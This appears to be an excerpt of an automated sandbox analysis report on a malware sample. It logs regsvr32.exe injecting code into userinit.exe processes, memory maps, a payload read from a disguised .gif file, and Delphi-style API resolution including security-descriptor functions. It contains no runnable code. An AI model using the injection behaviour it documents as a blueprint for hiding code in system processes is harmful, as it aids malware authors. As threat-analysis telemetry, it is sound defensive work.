iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 20 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffde008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0xaf8, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d820000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d6b0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = ´î, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d6e266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d6e2542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d6e1d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d6e238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d6e20c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d6e1fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d6e1e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d6e1f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d6e1ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d6e216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d6e22be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d6e21e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8220ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8220b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8220c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8220d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 1445871	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #66: userinit.exe

222

0

»

Information	Value
ID	#66
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:04:21, Reason: Child Process
Unmonitor	End Time: 00:04:24, Reason: Self Terminated
Monitor Duration	00:00:03

OS Process Information

»

Information	Value
PID	0xba0
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x B98 0x B94 0x B78

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rwx	-
pagefile_0x00000000000e0000	0x000e0000	0x000e6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000f0000	0x000f0000	0x000f1fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00100000	0x00100fff	Memory Mapped File	r	-
private_0x0000000000110000	0x00110000	0x0014ffff	Private Memory	rw	-
private_0x0000000000150000	0x00150000	0x00150fff	Private Memory	rwx	-
pagefile_0x0000000000160000	0x00160000	0x00161fff	Pagefile Backed Memory	r	-
private_0x00000000001b0000	0x001b0000	0x001bffff	Private Memory	rw	-
private_0x00000000001f0000	0x001f0000	0x001fffff	Private Memory	rw	-
private_0x0000000000200000	0x00200000	0x0027ffff	Private Memory	rw	-
userinit.exe	0x00290000	0x00298fff	Memory Mapped File	rwx	-
pagefile_0x00000000002a0000	0x002a0000	0x00367fff	Pagefile Backed Memory	r	-
private_0x0000000000370000	0x00370000	0x003f0fff	Private Memory	rw	-
private_0x0000000000370000	0x00370000	0x003f4fff	Private Memory	rw	-
private_0x0000000000370000	0x00370000	0x003f8fff	Private Memory	rw	-
private_0x0000000000370000	0x00370000	0x003fcfff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x00602fff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x00606fff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x0060afff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x0060efff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x00612fff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x00616fff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x0061afff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x0061efff	Private Memory	rw	-
private_0x0000000000620000	0x00620000	0x0071ffff	Private Memory	rw	-
pagefile_0x0000000000720000	0x00720000	0x0131ffff	Pagefile Backed Memory	r	-
private_0x0000000001320000	0x01320000	0x0141ffff	Private Memory	-	-
private_0x0000000001420000	0x01420000	0x0158ffff	Private Memory	rw	-
pagefile_0x0000000001420000	0x01420000	0x014fefff	Pagefile Backed Memory	r	-
private_0x0000000001550000	0x01550000	0x0158ffff	Private Memory	rw	-
private_0x0000000001590000	0x01590000	0x017affff	Private Memory	rw	-
private_0x0000000001590000	0x01590000	0x0169cfff	Private Memory	rw	-
private_0x00000000016a0000	0x016a0000	0x01730fff	Private Memory	rw	-
private_0x00000000016a0000	0x016a0000	0x01734fff	Private Memory	rw	-
private_0x00000000016a0000	0x016a0000	0x01738fff	Private Memory	rw	-
private_0x00000000016a0000	0x016a0000	0x0173cfff	Private Memory	rw	-
private_0x00000000016a0000	0x016a0000	0x01740fff	Private Memory	rw	-
private_0x00000000016a0000	0x016a0000	0x01744fff	Private Memory	rw	-
private_0x00000000016a0000	0x016a0000	0x01748fff	Private Memory	rw	-
private_0x00000000016a0000	0x016a0000	0x0174cfff	Private Memory	rw	-
private_0x00000000016a0000	0x016a0000	0x01750fff	Private Memory	rw	-
private_0x00000000016a0000	0x016a0000	0x01754fff	Private Memory	rw	-
private_0x00000000016a0000	0x016a0000	0x01758fff	Private Memory	rw	-
private_0x00000000016a0000	0x016a0000	0x0175cfff	Private Memory	rw	-
private_0x00000000016a0000	0x016a0000	0x01760fff	Private Memory	rw	-
private_0x00000000016a0000	0x016a0000	0x01764fff	Private Memory	rw	-
private_0x00000000016a0000	0x016a0000	0x01768fff	Private Memory	rw	-
private_0x00000000016a0000	0x016a0000	0x0176cfff	Private Memory	rw	-
private_0x00000000016b0000	0x016b0000	0x016effff	Private Memory	rw	-
private_0x0000000001770000	0x01770000	0x017affff	Private Memory	rw	-
staticcache.dat	0x017b0000	0x020dffff	Memory Mapped File	r	-
pagefile_0x00000000020e0000	0x020e0000	0x024d2fff	Pagefile Backed Memory	r	-
private_0x00000000024e0000	0x024e0000	0x025dffff	Private Memory	rw	-
private_0x00000000025e0000	0x025e0000	0x027dffff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x02882fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x02886fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x0288afff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x0288efff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x02892fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x02896fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x0289afff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x0289efff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028a2fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028a6fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028aafff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028aefff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028b4fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028b8fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028bcfff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028c2fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028c6fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028cafff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028cefff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028d4fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028d8fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028dcfff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028e2fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028e6fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028eafff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028effff	Private Memory	-	-
private_0x00000000028b0000	0x028b0000	0x02980fff	Private Memory	rw	-
private_0x00000000028c0000	0x028c0000	0x02996fff	Private Memory	rw	-
private_0x00000000028c0000	0x028c0000	0x0299afff	Private Memory	rw	-
private_0x00000000028c0000	0x028c0000	0x0299efff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029b4fff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029b8fff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029bcfff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029c0fff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029d6fff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029dafff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029defff	Private Memory	rw	-
private_0x00000000028f0000	0x028f0000	0x029f4fff	Private Memory	rw	-
private_0x00000000028f0000	0x028f0000	0x029f8fff	Private Memory	rw	-
private_0x00000000028f0000	0x028f0000	0x029fcfff	Private Memory	rw	-
private_0x0000000002990000	0x02990000	0x02a62fff	Private Memory	rw	-
private_0x00000000029a0000	0x029a0000	0x02a80fff	Private Memory	rw	-
private_0x00000000029d0000	0x029d0000	0x02ac2fff	Private Memory	rw	-
private_0x00000000029e0000	0x029e0000	0x02ae0fff	Private Memory	rw	-
private_0x0000000002a00000	0x02a00000	0x02b12fff	Private Memory	rwx	-
private_0x0000000002b20000	0x02b20000	0x02c1ffff	Private Memory	-	-
private_0x0000000002d20000	0x02d20000	0x02e1ffff	Private Memory	rw	-
sortdefault.nls	0x02e20000	0x030eefff	Memory Mapped File	r	-
comctl32.dll	0x6d6b0000	0x6d733fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d800000	0x6d818fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd4000	0x7ffd4000	0x7ffd4fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffd4008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0xb98, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d800000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d6b0000	2	Fn
